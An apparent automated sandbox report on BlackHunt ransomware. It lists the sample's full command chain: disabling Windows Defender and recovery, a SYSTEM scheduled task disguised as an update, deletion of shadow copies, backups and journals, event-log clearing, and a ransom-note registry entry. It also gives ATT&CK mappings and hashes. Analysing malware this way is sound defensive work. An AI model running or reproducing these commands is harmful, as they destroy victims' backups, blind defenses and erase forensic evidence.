C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2600
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:2804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3060 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:2772
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f2⤵
- Suspicious use of WriteProcessMemory
PID:2868 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v "{2C5F9FCC-F266-43F6-BFD7-838DAE269E11}" /t REG_SZ /d "C:\ProgramData\#BlackHunt_ReadMe.hta" /f3⤵
- Adds Run key to start application
PID:2788
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f2⤵PID:2588
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f3⤵PID:2032
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵PID:1664
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f3⤵PID:676
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵PID:2832
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f3⤵PID:2164
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵PID:2488
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f3⤵PID:1364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵PID:2576
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f3⤵PID:2652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f2⤵PID:2732
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f3⤵PID:1908
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f2⤵PID:2992
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "High" /t REG_DWORD /d 6 /f3⤵PID:1680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f2⤵PID:1844
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f3⤵PID:2420
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f2⤵PID:240
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f3⤵PID:2544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f2⤵PID:1204
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoClose" /t REG_DWORD /d 1 /f3⤵PID:704
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f2⤵PID:2616
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f3⤵PID:2660
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f2⤵PID:2844
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f3⤵PID:336
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:2864
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f2⤵PID:2976
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f3⤵PID:2548
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f2⤵PID:3000
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f3⤵PID:2212
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f2⤵PID:1788
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f3⤵PID:1488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f2⤵PID:1792
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f3⤵PID:1364
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f2⤵PID:1900
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f3⤵PID:1612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f2⤵PID:1968
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f3⤵PID:1412
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f2⤵PID:2036
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f3⤵PID:532
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f2⤵PID:1620
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f3⤵PID:2624
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f2⤵PID:776
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f3⤵PID:1980
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f2⤵PID:332
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 1 /f3⤵PID:1996
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f2⤵PID:812
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 1 /f3⤵PID:3028
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe" /F2⤵PID:1040
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe" /F3⤵
- Creates scheduled task(s)
PID:2588
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB2⤵PID:324
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:2200
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded2⤵PID:596
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded3⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1324
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB2⤵PID:488
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=401MB3⤵
- Interacts with shadow copies
PID:1612
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded2⤵PID:2920
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=C:\ /on=C:\ /maxsize=unbounded3⤵
- Interacts with shadow copies
PID:2328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:1424
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1880
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2908
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:2816
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1444
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:2488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:1732
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:644
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1560
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:1984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1148
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2688
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D F:\2⤵PID:2956
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D F:\3⤵
- Enumerates connected drives
PID:2852
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D C:\2⤵PID:1980
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D C:\3⤵PID:1824
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil usn deletejournal /D M:\2⤵PID:556
-
C:\Windows\system32\fsutil.exefsutil usn deletejournal /D M:\3⤵
- Enumerates connected drives
PID:2248
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Setup2⤵PID:596
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Setup3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:204
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl System2⤵PID:2628
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl System3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:1968
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Application2⤵PID:2616
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Application3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2016
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security /e:false2⤵PID:2988
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security /e:false3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c vssadmin.exe Delete Shadows /all /quiet2⤵PID:2780
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet3⤵
- Interacts with shadow copies
PID:1804
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wevtutil.exe cl Security2⤵PID:2796
-
C:\Windows\system32\wevtutil.exewevtutil.exe cl Security3⤵
- Clears Windows event logs
- Suspicious use of AdjustPrivilegeToken
PID:2228
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} recoveryenabled No2⤵PID:2856
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No3⤵
- Modifies boot configuration data using bcdedit
PID:488
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c bcdedit /set {default} bootstatuspolicy IgnoreAllFailures2⤵PID:1992
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} bootstatuspolicy IgnoreAllFailures3⤵
- Modifies boot configuration data using bcdedit
PID:652
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f2⤵PID:2408
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "NoRun" /t REG_DWORD /d 0 /f3⤵PID:2984
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f2⤵PID:2052
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableTaskMgr" /t REG_DWORD /d 0 /f3⤵PID:2416
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c SCHTASKS.exe /Delete /TN "Windows Critical Update" /F2⤵PID:1740
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Delete /TN "Windows Critical Update" /F3⤵PID:1884
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f2⤵PID:2056
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticetext" /t REG_SZ /d " Your Network Infected With BlackHunt Ransomware Team. ALL Your important Files Encrypted and Stolen , Do You Want Your Files? read [ReadMe] Files carefully and contact us by [[email protected]] AND [[email protected]] " /f3⤵PID:2368
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c REG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f2⤵PID:1068
-
C:\Windows\system32\reg.exeREG ADD "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v "legalnoticecaption" /t REG_SZ /d "WARNING WARNING WARNING. " /f3⤵PID:1376
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable2⤵PID:1224
-
C:\Windows\system32\schtasks.exeschtasks.exe /Change /TN "\Microsoft\Windows\SystemRestore\SR" /disable3⤵PID:2476
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c wbadmin.exe delete catalog -quiet2⤵PID:1192
-
C:\Windows\system32\wbadmin.exewbadmin.exe delete catalog -quiet3⤵
- Deletes backup catalog
PID:1440
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c fsutil.exe usn deletejournal /D C:2⤵PID:360
-
C:\Windows\system32\fsutil.exefsutil.exe usn deletejournal /D C:3⤵
- Deletes NTFS Change Journal
PID:544
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /IM mshta.exe /f2⤵PID:2512
-
C:\Windows\system32\taskkill.exetaskkill /IM mshta.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:328
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c notepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt2⤵PID:2884
-
C:\Windows\system32\notepad.exenotepad.exe C:\ProgramData\#BlackHunt_ReadMe.txt3⤵PID:1716
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\ProgramData\#BlackHunt_ReadMe.hta2⤵PID:708
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 5 > nul & del "C:\Users\Admin\AppData\Local\Temp\51851a8e4d831199779c541f715dcb57463935bee59022671e86ddd234835791.exe"2⤵
- Deletes itself
PID:2748 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:540
-
-
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Modifies Windows Defender Real-time Protection settings
- Suspicious use of AdjustPrivilegeToken
PID:676
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2744
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:2444
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵PID:920
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵PID:240
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
1Windows Service
1Scheduled Task/Job
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
4File Deletion
3Modify Registry
5Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57434d02bd93a60a28431e7e6aa0e3954
SHA11edbfa30134acb2e3bb120dde79a098a8ce4a57f
SHA2560c05a3f2d678178f468902bfd6e678166bd4b73c35b903b6c5f32177ed5097d8
SHA51258ab8a6ca5152d5e16fe5311a554c85372fab726edcf8afd2c6a043811c2e9c87993582938cf097d2a288e4277bd97ee5ae2ab79b0b9049d3e7ea64fc926cf39
-
Filesize
12KB
MD53bf885897f173d3762bd1a61d17c9335
SHA1476b1e2cda00f3d619316c356fbaba74f2e83085
SHA256296e6dc3346e70c104b8844686eaf9f827312dbb4aaeb679ca2dd997e777a714
SHA5128535ad41ca5f131ec945b0762e69df577bccb72a59fced35002885c6ca0aee2adbcca2e4e6fd8b2da29fbe5fe072ee32d52f93b2947c0f69c4683edc2823d26c
-
Filesize
684B
MD5f8d13d32ae5f3eb94c0a61e01c4093e9
SHA1966f4896baa90612feaec6bfef0c9ab8c5e750c6
SHA25694871a07b0fa301633ed5dca2df239b146ef7f251e9c2e3981ff4872324a326a
SHA512783bca8b18cc1608e73b48cfd2d7848bbbadb8adeeb297bcda919795fe2d351909c0218fc892928eb2f7a860aa0ff3ac6229f6b8ffe6e3ad66562cda3bdb1e50